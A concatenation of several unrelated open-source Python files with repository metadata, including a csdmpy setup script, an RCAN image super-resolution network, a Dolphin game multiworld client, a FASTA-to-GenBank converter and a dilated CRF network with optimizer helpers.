"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Scientific/Engineering",
],
)
| 31.958333 | 79 | 0.649718 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import find_packages
from setuptools import setup
# Load package veersion number.
with open("csdmpy/__init__.py", "r") as f:
for line in f.readlines():
if "__version__" in line:
before_keyword, keyword, after_keyword = line.partition("=")
version = after_keyword.strip()[1:-1]
# What packages are required for this module to be executed?
required = [
"numpy>=1.17",
"setuptools>=27.3",
"astropy>=3.0",
"requests>=2.21.0",
"numexpr>=2.7.0",
]
extras = {"matplotlib": ["matplotlib>=3.0"]}
setup_requires = ["setuptools>=27.3"]
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with open(os.path.join(here, "README.md"), encoding="utf-8") as f:
long_description = "\n" + f.read()
except FileNotFoundError:
long_description = ""
setup(
name="csdmpy",
version=version,
description="A python module for the core scientific dataset model.",
long_description=long_description,
long_description_content_type="text/markdown",
author="Deepansh Srivastava",
author_email="srivastava.89@osu.edu",
python_requires=">=3.6",
url="https://github.com/DeepanshS/csdmpy/",
packages=find_packages(),
install_requires=required,
setup_requires=setup_requires,
extras_require=extras,
tests_require=["pytest", "pytest-runner"],
include_package_data=True,
license="BSD-3-Clause",
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Scientific/Engineering",
],
)
| 0 | 0 | 0 |
c6e923edfcd10936710abd0a96247f4a5614f3a0 | 65 | py | Python | alerter/src/message_broker/rabbitmq/__init__.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 41 | 2019-08-23T12:40:42.000Z | 2022-03-28T11:06:02.000Z | alerter/src/message_broker/rabbitmq/__init__.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 147 | 2019-08-30T22:09:48.000Z | 2022-03-30T08:46:26.000Z | alerter/src/message_broker/rabbitmq/__init__.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 3 | 2019-09-03T21:12:28.000Z | 2021-08-18T14:27:56.000Z | from src.message_broker.rabbitmq.rabbitmq_api import RabbitMQApi
| 32.5 | 64 | 0.892308 | from src.message_broker.rabbitmq.rabbitmq_api import RabbitMQApi
| 0 | 0 | 0 |
36f8c1feebe983d31c6dc6408a16ba23e194cf98 | 643 | py | Python | datamanager/processing_gribnc_data/driver.py | mr-atharva-kulkarni/Algorithms-for-Sea-Route-Optimizaiton | 48d90ad2445b60d2228ed0aac60e1acba773b345 | [
"MIT"
] | null | null | null | datamanager/processing_gribnc_data/driver.py | mr-atharva-kulkarni/Algorithms-for-Sea-Route-Optimizaiton | 48d90ad2445b60d2228ed0aac60e1acba773b345 | [
"MIT"
] | null | null | null | datamanager/processing_gribnc_data/driver.py | mr-atharva-kulkarni/Algorithms-for-Sea-Route-Optimizaiton | 48d90ad2445b60d2228ed0aac60e1acba773b345 | [
"MIT"
] | null | null | null | import geojson
import requests
fileName = input("Enter Filename:")
parameterName = input("Enter Parameter Name:")
parameterName = parameterName.lower().capitalize()
typeOfLevelName = input("Enter type of level:")
levelName = input("Enter level:")
levelVal = int(levelName)
foreCastHourName = input("Enter forecast hour:")
forecastHour = int(foreCastHourName)
myjson = {
"fileName":fileName,
"parameterName":parameterName,
"forecastHour":forecastHour
}
mygeojson = requests.post("http://127.0.0.1:5000/get-geo",json=myjson)
mygeojson = mygeojson.json()
with open("grib2geo.json","w") as write_file:
geojson.dump(mygeojson,write_file)
| 32.15 | 70 | 0.757387 | import geojson
import requests
fileName = input("Enter Filename:")
parameterName = input("Enter Parameter Name:")
parameterName = parameterName.lower().capitalize()
typeOfLevelName = input("Enter type of level:")
levelName = input("Enter level:")
levelVal = int(levelName)
foreCastHourName = input("Enter forecast hour:")
forecastHour = int(foreCastHourName)
myjson = {
"fileName":fileName,
"parameterName":parameterName,
"forecastHour":forecastHour
}
mygeojson = requests.post("http://127.0.0.1:5000/get-geo",json=myjson)
mygeojson = mygeojson.json()
with open("grib2geo.json","w") as write_file:
geojson.dump(mygeojson,write_file)
| 0 | 0 | 0 |
e688e699c0a8417169a2ba5399135c7797330ec6 | 3,180 | py | Python | Client/clientGameConnection.py | JarheadHME/Multiworld_Client | 7f264eb8631b9c1edd58bc31bb5bbbcfa3ec2314 | [
"MIT"
] | null | null | null | Client/clientGameConnection.py | JarheadHME/Multiworld_Client | 7f264eb8631b9c1edd58bc31bb5bbbcfa3ec2314 | [
"MIT"
] | null | null | null | Client/clientGameConnection.py | JarheadHME/Multiworld_Client | 7f264eb8631b9c1edd58bc31bb5bbbcfa3ec2314 | [
"MIT"
] | null | null | null | import asyncio
from asyncio import Task
from typing import List
from base_logger import logging
logger = logging.getLogger(__name__)
from Dolphin.dolphinGameHandler import DolphinGameHandler
from Model.itemDto import ItemDto
from util.abstractGameHandler import AbstractGameHandler
from PySide6.QtCore import Signal
| 37.857143 | 120 | 0.641509 | import asyncio
from asyncio import Task
from typing import List
from base_logger import logging
logger = logging.getLogger(__name__)
from Dolphin.dolphinGameHandler import DolphinGameHandler
from Model.itemDto import ItemDto
from util.abstractGameHandler import AbstractGameHandler
from PySide6.QtCore import Signal
class ClientGameConnection:
_items_to_process: List[ItemDto] = list()
_items_to_send: List[ItemDto] = list()
_world_id: int = 0
_console_handler: AbstractGameHandler
gui_logger_signal: Signal
def __init__(self, world_id: int):
self._console_handler = DolphinGameHandler(world_id)
async def process_items(self) -> None:
while len(self._items_to_process) > 0:
item_dto = self._items_to_process[-1]
await self.log(item_dto.get_simple_output())
try:
if not await self._console_handler.give_item(item_dto.itemId):
await asyncio.sleep(3)
continue
self._items_to_process.pop()
await asyncio.sleep(0)
except RuntimeError as exc:
logger.error(exc)
del exc
async def handle(self) -> None:
await self.log("Connected To Console")
while await self._console_handler.is_connected(): # Thread set interval instead of a while loop would be better
try:
state = await self._console_handler.get_queued_items()
if state[0] != 0 and state[1] != 0 and state[1] != 0xFF:
item_dto = ItemDto(self._world_id, 0, state[1]) # World ID should be set in client
await self.log(item_dto.get_simple_output())
self._items_to_send.append(item_dto)
await self._console_handler.clear_queued_items()
except RuntimeError as rne:
del rne
finally:
if len(self._items_to_process) > 0:
asyncio.create_task(self.process_items())
await asyncio.sleep(0)
await self.log("Disconnected from Console, attempting to reconnect.....")
async def connect(self, gui_logger_signal: Signal) -> Task:
self.gui_logger_signal = gui_logger_signal
await self.log("Connecting to Console")
while not await self._console_handler.is_connected():
await self._console_handler.connect()
if await self._console_handler.is_connected():
break
await asyncio.sleep(15)
await self.log("Console was not found, trying again in 15 seconds.")
return asyncio.create_task(self.handle())
async def log(self, message: str) -> None:
if isinstance(self.gui_logger_signal, Signal):
self.gui_logger_signal.emit(message)
else:
logger.info(message)
def get_item_to_send(self) -> List[ItemDto]:
return self._items_to_send
def remove_item_to_send(self, item_dto:ItemDto):
self._items_to_send.remove(item_dto)
def push_item_to_process(self, item_dto: ItemDto) -> None:
self._items_to_process.append(item_dto)
| 2,429 | 408 | 23 |
5dce291b545fd45c8302c3044c37326984355ce7 | 982 | py | Python | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2odownload_csv.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 6,098 | 2015-05-22T02:46:12.000Z | 2022-03-31T16:54:51.000Z | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2odownload_csv.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,517 | 2015-05-23T02:10:54.000Z | 2022-03-30T17:03:39.000Z | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2odownload_csv.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,199 | 2015-05-22T04:09:55.000Z | 2022-03-28T22:20:45.000Z | from __future__ import print_function
import sys, os
sys.path.insert(1,"../../../")
from tests import pyunit_utils
import h2o
def h2odownload_csv():
"""
Python API test: h2o.download_csv(data, filename)
"""
training_data = h2o.import_file(pyunit_utils.locate("smalldata/logreg/benign.csv"))
try:
results_dir = pyunit_utils.locate("results") # find directory path to results folder
filename = os.path.join(results_dir, "benign.csv")
h2o.download_csv(training_data, filename) # save csv
assert os.path.isfile(filename), "h2o.download_csv() command is not working."
except Exception as e:
if 'File not found' in e.args[0]:
print("Directory is not writable. h2o.download_csv() command is not tested.")
else:
assert False, "h2o.download_csvresult() command is not working."
if __name__ == "__main__":
pyunit_utils.standalone_test(h2odownload_csv)
else:
h2odownload_csv()
| 36.37037 | 95 | 0.680244 | from __future__ import print_function
import sys, os
sys.path.insert(1,"../../../")
from tests import pyunit_utils
import h2o
def h2odownload_csv():
"""
Python API test: h2o.download_csv(data, filename)
"""
training_data = h2o.import_file(pyunit_utils.locate("smalldata/logreg/benign.csv"))
try:
results_dir = pyunit_utils.locate("results") # find directory path to results folder
filename = os.path.join(results_dir, "benign.csv")
h2o.download_csv(training_data, filename) # save csv
assert os.path.isfile(filename), "h2o.download_csv() command is not working."
except Exception as e:
if 'File not found' in e.args[0]:
print("Directory is not writable. h2o.download_csv() command is not tested.")
else:
assert False, "h2o.download_csvresult() command is not working."
if __name__ == "__main__":
pyunit_utils.standalone_test(h2odownload_csv)
else:
h2odownload_csv()
| 0 | 0 | 0 |
501133344b118a98f39410df479eb520956042e0 | 5,952 | py | Python | codes/models/archs/RCAN_arch.py | AyeshaSadiqa/thesis | 761eb0c37acd42707d52d4a6bfabe8ac566d8aa4 | [
"Apache-2.0"
] | 77 | 2021-08-14T04:43:49.000Z | 2022-03-08T13:41:10.000Z | codes/models/archs/RCAN_arch.py | AyeshaSadiqa/thesis | 761eb0c37acd42707d52d4a6bfabe8ac566d8aa4 | [
"Apache-2.0"
] | 8 | 2021-10-30T14:52:11.000Z | 2022-03-09T12:44:54.000Z | codes/models/archs/RCAN_arch.py | AyeshaSadiqa/thesis | 761eb0c37acd42707d52d4a6bfabe8ac566d8aa4 | [
"Apache-2.0"
] | 7 | 2021-08-22T00:47:44.000Z | 2022-03-08T10:25:54.000Z | import math
import torch
from torch import nn as nn
from models.archs.arch_util import make_layer
class Upsample(nn.Sequential):
"""Upsample module.
Args:
scale (int): Scale factor. Supported scales: 2^n and 3.
num_feat (int): Channel number of intermediate features.
"""
class ChannelAttention(nn.Module):
"""Channel attention used in RCAN.
Args:
num_feat (int): Channel number of intermediate features.
squeeze_factor (int): Channel squeeze factor. Default: 16.
"""
class RCAB(nn.Module):
"""Residual Channel Attention Block (RCAB) used in RCAN.
Args:
num_feat (int): Channel number of intermediate features.
squeeze_factor (int): Channel squeeze factor. Default: 16.
res_scale (float): Scale the residual. Default: 1.
"""
class ResidualGroup(nn.Module):
"""Residual Group of RCAB.
Args:
num_feat (int): Channel number of intermediate features.
num_block (int): Block number in the body network.
squeeze_factor (int): Channel squeeze factor. Default: 16.
res_scale (float): Scale the residual. Default: 1.
"""
class RCAN(nn.Module):
"""Residual Channel Attention Networks.
Paper: Image Super-Resolution Using Very Deep Residual Channel Attention
Networks
Ref git repo: https://github.com/yulunzhang/RCAN.
Args:
num_in_ch (int): Channel number of inputs.
num_out_ch (int): Channel number of outputs.
num_feat (int): Channel number of intermediate features.
Default: 64.
num_group (int): Number of ResidualGroup. Default: 10.
num_block (int): Number of RCAB in ResidualGroup. Default: 16.
squeeze_factor (int): Channel squeeze factor. Default: 16.
upscale (int): Upsampling factor. Support 2^n and 3.
Default: 4.
res_scale (float): Used to scale the residual in residual block.
Default: 1.
img_range (float): Image range. Default: 255.
rgb_mean (tuple[float]): Image mean in RGB orders.
Default: (0.4488, 0.4371, 0.4040), calculated from DIV2K dataset.
"""
if __name__ == '__main__':
x = torch.randn(4, 3, 3, 64, 64)
model = RCAN(num_in_ch=3,
num_out_ch=3,
num_frames=3,
num_feat=64,
num_group=5,
num_block=2,
squeeze_factor=16,
upscale=1,
res_scale=1)
out = model(x)
print(out.shape)
| 33.251397 | 78 | 0.573589 | import math
import torch
from torch import nn as nn
from models.archs.arch_util import make_layer
class Upsample(nn.Sequential):
"""Upsample module.
Args:
scale (int): Scale factor. Supported scales: 2^n and 3.
num_feat (int): Channel number of intermediate features.
"""
def __init__(self, scale, num_feat):
m = []
if (scale & (scale - 1)) == 0: # scale = 2^n
for _ in range(int(math.log(scale, 2))):
m.append(nn.Conv2d(num_feat, 4 * num_feat, 3, 1, 1))
m.append(nn.PixelShuffle(2))
elif scale == 3:
m.append(nn.Conv2d(num_feat, 9 * num_feat, 3, 1, 1))
m.append(nn.PixelShuffle(3))
else:
raise ValueError(f'scale {scale} is not supported. '
'Supported scales: 2^n and 3.')
super(Upsample, self).__init__(*m)
class ChannelAttention(nn.Module):
"""Channel attention used in RCAN.
Args:
num_feat (int): Channel number of intermediate features.
squeeze_factor (int): Channel squeeze factor. Default: 16.
"""
def __init__(self, num_feat, squeeze_factor=16):
super(ChannelAttention, self).__init__()
self.attention = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(num_feat, num_feat // squeeze_factor, 1, padding=0),
nn.ReLU(inplace=True),
nn.Conv2d(num_feat // squeeze_factor, num_feat, 1, padding=0),
nn.Sigmoid())
def forward(self, x):
y = self.attention(x)
return x * y
class RCAB(nn.Module):
"""Residual Channel Attention Block (RCAB) used in RCAN.
Args:
num_feat (int): Channel number of intermediate features.
squeeze_factor (int): Channel squeeze factor. Default: 16.
res_scale (float): Scale the residual. Default: 1.
"""
def __init__(self, num_feat, squeeze_factor=16, res_scale=1):
super(RCAB, self).__init__()
self.res_scale = res_scale
self.rcab = nn.Sequential(
nn.Conv2d(num_feat, num_feat, 3, 1, 1), nn.ReLU(True),
nn.Conv2d(num_feat, num_feat, 3, 1, 1),
ChannelAttention(num_feat, squeeze_factor))
def forward(self, x):
res = self.rcab(x) * self.res_scale
return res + x
class ResidualGroup(nn.Module):
"""Residual Group of RCAB.
Args:
num_feat (int): Channel number of intermediate features.
num_block (int): Block number in the body network.
squeeze_factor (int): Channel squeeze factor. Default: 16.
res_scale (float): Scale the residual. Default: 1.
"""
def __init__(self, num_feat, num_block, squeeze_factor=16, res_scale=1):
super(ResidualGroup, self).__init__()
self.residual_group = make_layer(
RCAB,
num_block,
num_feat=num_feat,
squeeze_factor=squeeze_factor,
res_scale=res_scale)
self.conv = nn.Conv2d(num_feat, num_feat, 3, 1, 1)
def forward(self, x):
res = self.conv(self.residual_group(x))
return res + x
class RCAN(nn.Module):
"""Residual Channel Attention Networks.
Paper: Image Super-Resolution Using Very Deep Residual Channel Attention
Networks
Ref git repo: https://github.com/yulunzhang/RCAN.
Args:
num_in_ch (int): Channel number of inputs.
num_out_ch (int): Channel number of outputs.
num_feat (int): Channel number of intermediate features.
Default: 64.
num_group (int): Number of ResidualGroup. Default: 10.
num_block (int): Number of RCAB in ResidualGroup. Default: 16.
squeeze_factor (int): Channel squeeze factor. Default: 16.
upscale (int): Upsampling factor. Support 2^n and 3.
Default: 4.
res_scale (float): Used to scale the residual in residual block.
Default: 1.
img_range (float): Image range. Default: 255.
rgb_mean (tuple[float]): Image mean in RGB orders.
Default: (0.4488, 0.4371, 0.4040), calculated from DIV2K dataset.
"""
def __init__(self,
num_in_ch,
num_out_ch,
num_frames,
num_feat=64,
num_group=10,
num_block=16,
squeeze_factor=16,
upscale=4,
res_scale=1,
img_range=255.,
rgb_mean=(0.4488, 0.4371, 0.4040)):
super(RCAN, self).__init__()
# self.img_range = img_range
# self.mean = torch.Tensor(rgb_mean).view(1, 3, 1, 1)
self.conv_first = nn.Conv2d(num_in_ch * num_frames, num_feat, 3, 1, 1)
self.body = make_layer(
ResidualGroup,
num_group,
num_feat=num_feat,
num_block=num_block,
squeeze_factor=squeeze_factor,
res_scale=res_scale)
self.conv_after_body = nn.Conv2d(num_feat, num_feat, 3, 1, 1)
self.upsample = Upsample(upscale, num_feat)
self.conv_last = nn.Conv2d(num_feat, num_out_ch, 3, 1, 1)
def forward(self, x):
# self.mean = self.mean.type_as(x)
# x = (x - self.mean) * self.img_range
if x.dim() == 5:
B, N, C, H, W = x.shape
x = x.view(B, N*C, H, W)
x = self.conv_first(x)
res = self.conv_after_body(self.body(x))
res += x
x = self.conv_last(self.upsample(res))
# x = x / self.img_range + self.mean
return x
if __name__ == '__main__':
x = torch.randn(4, 3, 3, 64, 64)
model = RCAN(num_in_ch=3,
num_out_ch=3,
num_frames=3,
num_feat=64,
num_group=5,
num_block=2,
squeeze_factor=16,
upscale=1,
res_scale=1)
out = model(x)
print(out.shape)
| 3,167 | 0 | 243 |
c2181aeb8e9a201390010d5f8b9cbabbb2dca0d3 | 709 | py | Python | fasta_manipulation/fasta_to_genbank.py | olgatsiouri1996/biomisc | b4fdaf3dd49816b7ca9da1d200ab4443455ab784 | [
"MIT"
] | 2 | 2020-06-18T23:43:15.000Z | 2020-10-02T12:32:21.000Z | fasta_manipulation/fasta_to_genbank.py | olgatsiouri1996/biomisc | b4fdaf3dd49816b7ca9da1d200ab4443455ab784 | [
"MIT"
] | 1 | 2021-04-18T00:15:24.000Z | 2021-08-01T20:46:02.000Z | fasta_manipulation/fasta_to_genbank.py | olgatsiouri1996/biomisc | b4fdaf3dd49816b7ca9da1d200ab4443455ab784 | [
"MIT"
] | null | null | null | # python3
import argparse
from Bio import SeqIO
from Bio.Alphabet import generic_dna, generic_protein
# imput parameters
ap = argparse.ArgumentParser()
ap.add_argument("-fa","--fasta", required=True, help="input fasta file")
ap.add_argument("-gb", "--genbank", required=True, help="output genbank file")
args = vars(ap.parse_args())
# main
input_handle = open(args['fasta'], "rU")
output_handle = open(args['genbank'], "w")
# import fasta
sequences = list(SeqIO.parse(input_handle, "fasta"))
# asign generic_dna or generic_protein
for seq in sequences:
seq.seq.alphabet = generic_dna
# output
count = SeqIO.write(sequences, output_handle, "genbank")
output_handle.close()
input_handle.close()
| 27.269231 | 78 | 0.737659 | # python3
import argparse
from Bio import SeqIO
from Bio.Alphabet import generic_dna, generic_protein
# imput parameters
ap = argparse.ArgumentParser()
ap.add_argument("-fa","--fasta", required=True, help="input fasta file")
ap.add_argument("-gb", "--genbank", required=True, help="output genbank file")
args = vars(ap.parse_args())
# main
input_handle = open(args['fasta'], "rU")
output_handle = open(args['genbank'], "w")
# import fasta
sequences = list(SeqIO.parse(input_handle, "fasta"))
# asign generic_dna or generic_protein
for seq in sequences:
seq.seq.alphabet = generic_dna
# output
count = SeqIO.write(sequences, output_handle, "genbank")
output_handle.close()
input_handle.close()
| 0 | 0 | 0 |
3f2a837c7448ee33c18e813bdaf73a07903d0fe7 | 643 | py | Python | backend/blog.py | bbruceyuan/easy-blog | 742bd8d0c8f3d8af793c4e8f531daad410a46151 | [
"MIT"
] | 1 | 2018-08-01T10:51:54.000Z | 2018-08-01T10:51:54.000Z | backend/blog.py | hey-bruce/easy_blog | 742bd8d0c8f3d8af793c4e8f531daad410a46151 | [
"MIT"
] | 1 | 2019-07-20T07:14:25.000Z | 2019-07-20T07:14:25.000Z | backend/blog.py | bbruceyuan/easy-blog | 742bd8d0c8f3d8af793c4e8f531daad410a46151 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Created by BBruceyuan on 18-7-9.
from flask_script import Manager
from flask_script import Shell
from flask_migrate import Migrate, MigrateCommand
from flask import current_app
from app import create_app
from app import db
blog = create_app('develop')
manager = Manager(blog)
# with blog.app_context():
# print(current_app.config['SECRET_KEY'])
# manager.run()
migrate = Migrate(blog, db)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
| 20.09375 | 68 | 0.755832 | #!/usr/bin/env python
# Created by BBruceyuan on 18-7-9.
from flask_script import Manager
from flask_script import Shell
from flask_migrate import Migrate, MigrateCommand
from flask import current_app
from app import create_app
from app import db
blog = create_app('develop')
manager = Manager(blog)
# with blog.app_context():
# print(current_app.config['SECRET_KEY'])
# manager.run()
migrate = Migrate(blog, db)
def make_shell_context():
return dict(app=blog, db=db)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
| 37 | 0 | 23 |
04bd0d40cfcfb96beef4e0573e3a0ec93949247b | 9,410 | py | Python | utils/network.py | dunknowcoding/DilatedCRF | 416ca017d280632353824902df2ea7c035acf1c5 | [
"Apache-2.0"
] | 1 | 2022-02-01T00:42:19.000Z | 2022-02-01T00:42:19.000Z | utils/network.py | dunknowcoding/DilatedCRF | 416ca017d280632353824902df2ea7c035acf1c5 | [
"Apache-2.0"
] | null | null | null | utils/network.py | dunknowcoding/DilatedCRF | 416ca017d280632353824902df2ea7c035acf1c5 | [
"Apache-2.0"
] | 1 | 2022-02-11T09:31:13.000Z | 2022-02-11T09:31:13.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
: Project - Dialted CRF
: Network frameworks and helpers
: Author - Xi Mo
: Institute - University of Kansas
: Date - 6/24/2021
: Last Update - 7/10/2021
: License: Apache 2.0
"""
import torch
import torch.nn as nn
import torch.nn.functional as ops
import time
import math
from pathlib import Path
from utils.configuration import CONFIG
# optimizer parser
# Write model to disk
| 44.386792 | 90 | 0.453454 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
: Project - Dialted CRF
: Network frameworks and helpers
: Author - Xi Mo
: Institute - University of Kansas
: Date - 6/24/2021
: Last Update - 7/10/2021
: License: Apache 2.0
"""
import torch
import torch.nn as nn
import torch.nn.functional as ops
import time
import math
from pathlib import Path
from utils.configuration import CONFIG
class DSConv(nn.Module):
def __init__(self, depth=CONFIG["NUM_CLS"], stride=1):
super(DSConv, self).__init__()
self.dsconv = nn.Sequential(
nn.Conv2d(1, 1, (depth, 1), stride = stride),
nn.BatchNorm2d(1, affine = True),
nn.ReLU6(inplace = True)
)
def forward(self, feat):
convFeat = self.dsconv(feat)
avgFeat = ops.adaptive_avg_pool3d(feat, (1, 1, 1))
maxFeat = ops.adaptive_max_pool3d(feat, (1, 1, 1))
return avgFeat, maxFeat
class Aggregate(nn.Module):
def __init__(self, inChan = CONFIG["NUM_CLS"], scale = 0.25):
super(Aggregate, self).__init__()
self.DSCModules = nn.ModuleList([])
H, W = CONFIG["SIZE"]
H, W = int(H * scale), int(W * scale)
d = int(math.sqrt(H * W)/2) # for full-size, use d = int(math.sqrt(H * W) / 10)
# d = int(math.sqrt(H * W) / 10)
# upsampling for average global pooling
self.upSampleAvg = nn.Sequential(
nn.Linear(d, H * W, bias = True),
nn.LayerNorm(H * W,),
nn.ReLU6(inplace = True)
)
# upsampling for max global pooling
self.upSampleMax = nn.Sequential(
nn.Linear(d, H * W, bias = True),
nn.LayerNorm(H * W),
nn.ReLU6(inplace = True)
)
for _ in range(d):
self.DSCModules.append(DSConv(inChan))
def forward(self, feat):
for sk, module in enumerate(self.DSCModules):
if sk == 0:
avgFeat, maxFeat = module(feat)
else:
tmpAvgFeat, tmpMaxFeat = module(feat)
avgFeat = torch.cat((avgFeat, tmpAvgFeat), 3)
maxFeat = torch.cat((maxFeat, tmpMaxFeat), 3)
avgFeat = self.upSampleAvg(avgFeat)
maxFeat = self.upSampleMax(maxFeat)
return avgFeat, maxFeat
class global_energy(nn.Module):
def __init__(self, inChan = CONFIG["NUM_CLS"], scale = 0.125):
super(global_energy, self).__init__()
self.inChan = inChan
self.scale = scale
H, W = CONFIG["SIZE"]
self.H, self.W = int(H * scale), int(W * scale)
self.globalFeats = Aggregate(inChan, self.scale)
self.conv = nn.Sequential(
nn.Conv2d(2 + CONFIG["NUM_CLS"], CONFIG["NUM_CLS"], 1, bias = True),
nn.BatchNorm2d(CONFIG["NUM_CLS"], affine = True),
nn.ReLU6(inplace = True)
)
def forward(self, feat):
transFeat = feat.view(feat.shape[0], feat.shape[1], 1, -1)
transFeat = torch.transpose(transFeat, 1, 2)
avgFeat, maxFeat = self.globalFeats(transFeat)
avgFeat = avgFeat.view(avgFeat.shape[0], 1, self.H, self.W)
maxFeat = maxFeat.view(maxFeat.shape[0], 1, self.H, self.W)
Feat = self.conv(torch.cat((avgFeat, maxFeat, feat), 1))
return Feat
class dialated_crf(nn.Module):
def __init__(self, inChan = CONFIG["NUM_CLS"], scale = 0.125):
super(dialated_crf, self).__init__()
self.scale = scale
if scale != 1:
self.downSample = nn.FractionalMaxPool2d(3, output_ratio = scale)
self.getGlobalEnergy = global_energy(inChan = inChan, scale = scale)
self.getUnary = nn.Sequential(
nn.Conv2d(CONFIG["NUM_CLS"], CONFIG["NUM_CLS"], 1, bias = False),
nn.BatchNorm2d(CONFIG["NUM_CLS"]),
nn.ReLU6(inplace = True)
)
self.normlizer = nn.Sequential(
nn.Conv2d(2 * inChan, inChan, 1, 1, bias=False),
nn.BatchNorm2d(inChan)
)
def forward(self, feat):
if self.scale != 1: feat = self.downSample(feat)
unary = self.getUnary(feat)
out = self.getGlobalEnergy(feat)
out = torch.cat((out, unary), dim = 1)
out = self.normlizer(out)
if self.scale != 1: out = ops.interpolate(out, scale_factor=int(1 / self.scale))
return out
# optimizer parser
def optimizer(_net):
if CONFIG["OPTIM"] == "adamw":
optimizer = torch.optim.AdamW(_net.parameters(),
lr = CONFIG["LR"],
betas = CONFIG["BETAS"],
weight_decay = CONFIG["DECAY"],
eps = CONFIG["EPS"],
amsgrad = CONFIG["AMSGRAD"])
elif CONFIG["OPTIM"] == "adam":
optimizer = torch.optim.Adam(_net.parameters(),
lr = CONFIG["LR"],
betas = CONFIG["BETAS"],
weight_decay = CONFIG["DECAY"],
eps = CONFIG["EPS"],
amsgrad = CONFIG["AMSGRAD"])
elif CONFIG["OPTIM"] == "sgd":
optimizer = torch.optim.SGD(_net.parameters(),
lr = CONFIG["LR"],
momentum = CONFIG["MOMENT"],
weight_decay = CONFIG["DECAY"],
dampening = CONFIG["DAMPEN"],
nesterov = CONFIG["NESTROV"])
elif CONFIG["OPTIM"] == "rmsprop":
optimizer = torch.optim.RMSprop(_net.parameters(),
lr = CONFIG["LR"],
momentum = CONFIG["MOMENT"],
weight_decay = CONFIG["DECAY"],
alpha = CONFIG["ALPHA"],
eps = CONFIG["EPS"],
centered = CONFIG["CENTERED"])
elif CONFIG["OPTIM"] == "rprop":
optimizer = torch.optim.Rprop(_net.parameters(),
lr = CONFIG["LR"],
etas = CONFIG["ETAS"],
step_sizes = CONFIG["STEPSIZE"])
elif CONFIG["OPTIM"] == "adagrad":
optimizer = torch.optim.Adagrad(_net.parameters(),
lr = CONFIG["LR"],
lr_decay = CONFIG["LR_DECAY"],
weight_decay = CONFIG["DECAY"],
eps = CONFIG["EPS"])
elif CONFIG["OPTIM"] == "adadelta":
optimizer = torch.optim.Adadelta(_net.parameters(),
lr = CONFIG["LR"],
rho = CONFIG["RHO"],
weight_decay = CONFIG["DECAY"],
eps = CONFIG["EPS"])
elif CONFIG["OPTIM"] == "sparseadam":
optimizer = torch.optim.SparseAdam(_net.parameters(),
lr = CONFIG["LR"],
betas = CONFIG["BETAS"],
eps = CONFIG["EPS"])
elif CONFIG["OPTIM"] == "adamax":
optimizer = torch.optim.Adamax(_net.parameters(),
lr = CONFIG["LR"],
betas = CONFIG["BETAS"],
weight_decay = CONFIG["DECAY"],
eps = CONFIG["EPS"])
elif CONFIG["OPTIM"] == "asgd":
optimizer = torch.optim.ASGD(_net.parameters(),
lr = CONFIG["LR"],
lambd = CONFIG["LAMBD"],
alpha = CONFIG["ALPHA"],
weight_decay = CONFIG["DECAY"],
t0 = CONFIG["T0"])
else:
raise NameError(f"Unsupported optimizer {CONFIG['OPTIM']}, please customize it.")
return optimizer
# Write model to disk
def save_model(baseDir: Path, network: torch.nn.Module, epoch: int, logger: {},
optimizer: torch.optim, postfix="dcrf"):
date = time.strftime(f"%Y%m%d-%H%M%S-Epoch-{epoch}_{postfix}.pt", time.localtime())
path = baseDir.joinpath(date)
print("\nNow saveing model to:\n%s" %path)
torch.save({
'epoch': epoch,
'logs': logger,
'model_state_dict': network.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
}, path)
print("Done!\n") | 8,548 | 28 | 369 |
3ca35272338005ea0002852caf9dcad2fb40a023 | 6,977 | py | Python | backend/galvanalyser/database/__init__.py | Battery-Intelligence-Lab/galvanalyser | 3b7198df1caf015fcb802ba94df999aa36c08f4f | [
"BSD-2-Clause"
] | 13 | 2021-11-11T10:59:12.000Z | 2022-02-02T18:27:48.000Z | backend/galvanalyser/database/__init__.py | Battery-Intelligence-Lab/galvanalyser | 3b7198df1caf015fcb802ba94df999aa36c08f4f | [
"BSD-2-Clause"
] | 19 | 2021-11-11T14:20:53.000Z | 2022-02-16T09:49:27.000Z | backend/galvanalyser/database/__init__.py | Battery-Intelligence-Lab/galvanalyser | 3b7198df1caf015fcb802ba94df999aa36c08f4f | [
"BSD-2-Clause"
] | 1 | 2022-01-14T08:10:08.000Z | 2022-01-14T08:10:08.000Z | import psycopg2
from psycopg2 import sql
import string
import os
from .row import Row
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
